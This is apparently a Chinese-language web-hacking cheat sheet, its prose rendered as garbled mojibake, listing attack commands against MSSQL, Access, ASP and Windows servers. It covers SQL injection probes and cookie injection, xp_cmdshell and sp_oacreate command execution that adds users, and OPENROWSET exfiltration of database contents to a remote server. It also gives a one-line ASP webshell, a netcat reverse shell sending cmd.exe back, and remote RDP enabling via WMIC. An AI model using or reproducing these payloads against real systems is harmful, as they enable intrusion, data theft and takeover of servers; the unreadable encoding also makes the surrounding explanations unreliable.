վķ
SAݿ뼼SAݿ㷨+:
ע㲻Դ,ִҳ涼
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
Ŀ¼жϵͳΪ2000webݿ
Ҫ취õݿIPһˡ
עִ
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
ҳ淵ִͨtelnetһ⼦1433˿ڣȻnetstat/anûеõIP
NC˿ڶûеõIP
ͨעִҳ涼쳣⼦ͬҲûеõIP
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
ھͲDzݿҲ
accesstxtı
SELECT * into in 'd:\web\' 'text;' from admin
Զתָվͷ
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
java or jspվʱĬļ·:
\web-inf\web.xml
tomcatµļλ:
\conf\server.xml (ǰtomcat·)
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
ע·,ڹand or cookiesʱñЧ:
-1%23
>
<
1'+or+'1'='1
id=8%bf
ȫעԷ:
URLַ-1URLɣhttp://gzkb.goomoo.cn/news.asp?id=123-1صҳǰ治ͬһţʾע©͵ע©; URLַ -0URL http://gzkb.goomoo.cn/news.asp?id=123-0صҳǰҳͬ-1شҳ棬Ҳʾע©͵ġ
URLĵַ'%2B'URLַΪhttp://gzkb.goomoo.cn/news.asp?id=123'%2B'صҳ1ͬ;'2%2B'asdfURLַΪhttp://gzkb.goomoo.cn/news.asp?id=123'%2Basdfصҳ1ͬ˵δָ¼ߴʾע㣬ı͵ġ
עжϷ:
%' and '1'='1' and '%'='
%' and '1'='2' and '%'='
COOKIESע:
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
2000רҵ鿴ص¼û:
net config workstation
2003²鿴ipsecúĬϷǽ:
netsh firewall show config
netsh ipsec static show all
ָָ:
netsh ipsec static set policy name=test assign=n
netsh ipsec static show policy all
¹Ա̨С:
admin/left.asp
admin/main.asp
admin/top.asp
admin/admin.asp
ֳ˵,ȻѸȫ
Ṥѧ:
Ϣ http://tool.chinaz.com/ Whoisע˺ά
Ȼȥƭͷ
ͳϵͳʹõITѧϰߵͳϵͳһоϵͳwebshellһͶ֣1.ݿһ仰ľͻӵõ2.վҳдľwebshellݿĿ¼ݿչaspģĬ·:data/#ITlearner.asp,ݿչij*.mdbСӵݿߴзصıԱĬǣITlearnerݿһ仰ľ·߲ͨˣֻпڶַвĬ http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,鿴ԭ룺
maxlength="3"Ϊmaxlength="100">Ϊͻƹ̶ȵַ롣Ȼ Ϊaction="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">
ΪhtmlļϸϢ¼¼ĬΪ100100:eval request(chr(35))档ʾҵ֡
6. 554˿ real554.exe֡ 6129˿ dameware6129.exe֡ ϵͳ© 135445˿ڣms03026ms03039ms03049ms04011© ֡ 3127ȶ˿ doomĶ˿ڣnodoom.exe֡mydoomscan.exe飩
CMDעλ
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
AutoRun
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
AutoRun
עʱHidden,ijtest
mstsc /v:IP /console
һ仰3389:
Ͽ³һַ,һ仰3389,˵ֻ2003ϵͳ,,дʹҷһ°.ܼ,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
Զ̣WMIC /node:"Զ̻" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='Զ̻' call SetAllowTSConnections 1 ,ʵһЩ20033389,Ҳ,пһ֪.
ֶ֪ΣʹSQLACCESSݿмӸû:
Insert into admin(user,pwd) values('test','test')
NC
ڱִУnc -vv -lp Ķ˿ (Լִ)
ȻڷִУ nc -e cmd.exe ԼIP ͼĶ˿ (Էִ)
ڽűֹҪ%00ȷ²Ƿ
ʱֵʱwebshellûа취оվĿ¼dirҲеʱʱԳDOSSUBSTתĿ¼
:
subst k: d:\www\ dwwwĿ¼k
subst k: /d